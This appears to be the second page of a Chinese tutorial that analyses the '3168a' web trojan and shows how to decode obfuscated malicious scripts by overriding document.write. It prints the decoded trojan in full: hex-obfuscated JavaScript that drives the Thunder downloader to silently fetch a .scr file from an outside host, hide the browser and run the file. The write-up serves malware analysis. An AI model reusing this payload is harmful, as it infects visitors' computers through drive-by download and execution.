借"3168a网马"案例来分析所谓的自写函数加密解密网马

然后保存为t4nk.htm

然后用直接文件-打开你的t4nk.html
出现如下:

以下是引用片段： -------------------------------------------------------------------- <script language=javascript>uD77=1113;function _nr(){return true} onerror=_nr;gO21=8543;hK90=1116;cY88=6830;;_licensed_to_="huyufeng";</script><script src="important.js"></script> <script> var g_Downloaded1=0; var g_HaveRun1=0; var id_file1; thunder_server.SetConfig("\x4D\x65\x73\x73\x61\x67\x65\x50\x61\x6E\x65\x6C","\x44\x6F\x77 \x6E\x6C\x6F\x61\x64\x43\x6F\x6D\x70\x6C\x65\x74\x65","0"); thunder_server.SetConfig("\x53\x6F\x75\x6E\x64","\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43 \x6F\x6D\x70\x6C\x65\x74\x65","0"); thunder_server.SetConfig("\x4D\x65\x73\x73\x61\x67\x65\x50\x61\x6E\x65\x6C","\x44\x6F\x77 \x6E\x6C\x6F\x61\x64\x46\x61\x69\x6C","0"); window.clipboardData.setData ("T"+"\x65"+"x"+"t",""+"h"+""+"t"+"t"+"p"+"\x3A"+"\57"+"/"+"m"+""+"y"+"."+"x"+"u"+"n"+"l"+"e "+"i"+"\56"+"c"+"o"+"m"+"/e"+"r"+"ro"+"r"+"\x2E\x74"+"x"+""+"\x74"); function exec1() { if(g_HaveRun1==1) { thunder_server.DeleteTask(id_file1, 0); return; } var ret=thunder_server.OpenTaskFile(id_file1, -1); if(ret==0)g_HaveRun1=1; } function RunApp1() { var ary=thunder_server.GetTaskList("\x31\x31", 0, 1, 0).split("{\r*\r}"); id_file1=ary[1]; setInterval('exec1()',500); } function commit_task1() { var ret = thunder_server.CommitTask(0, "h"+"t"+"t"+"p"+":"+"/"+"/"+"\x6F\x72\x61 \x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\x2F\x53\x33\x36\x38\x2F\x53\x33\x36\x38\x2E\x73 \x63\x72", "\x63\x3A\x5C\x5C"); if (ret == 0&&g_Downloaded1==0) { g_Downloaded1=1; thunder_server.HideBrowserWindow(1); RunApp1(); } else return; } setInterval('\x63\x6F\x6D\x6D\x69\x74\x5F\x74\x61\x73\x6B\x31\x28\x29',1); var strUrl = get_server_path() + "\x50\x61\x67\x65\x2F\x61\x64\x64\x5F\x74\x61\x73 \x6B\x2E\x68\x74\x6D"; thunder_server.SetBrowserWindowData(strUrl, "\u672A\u77E5\u9519\u8BEF"); </script> --------------------------------------------------------------------------------------

讲到这里 大家应该明白所谓自写函数加密网马解密工具的原理的吧

我感觉这点东西不知道有没有必要写成工具 所以以前就没有去写。。。

嘿嘿

大家想写 直接memo一个 savefileto然后 直接用浏览器执行代码后再load回来 就可以啦

你自己也可以写一个“自写函数加密网马解密工具”的

呵呵～～

最后

以后还有其它解不开的脚本,可以用这段试一下,但是自写过程无效,只能对付100%的IE自身方法的加密:

以下是引用片段： <script>document._write = document.write; document.write = function(html) {this._write (html.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")); }; document.writeln = function(html){this.write(html);this.write("\r\n");}</script><pre><!-- 请把加密的代码完整贴上箭头的后面 然后运行代码后 浏览器会告诉你解密后的代码 嘿嘿 下面是箭头 -->

PS:其实这个方法最早发现的并不是俺 俺只是很早以前google找东西的时候找到的 只是没有发布出来

最近客户说有个叫"自写函数加密网马解密工具" 一看就知道这原理了 所以公布了

收工 by T4nk

最后大家可以试着用手工 来的方便点 嘿嘿

上一页  [1] [2]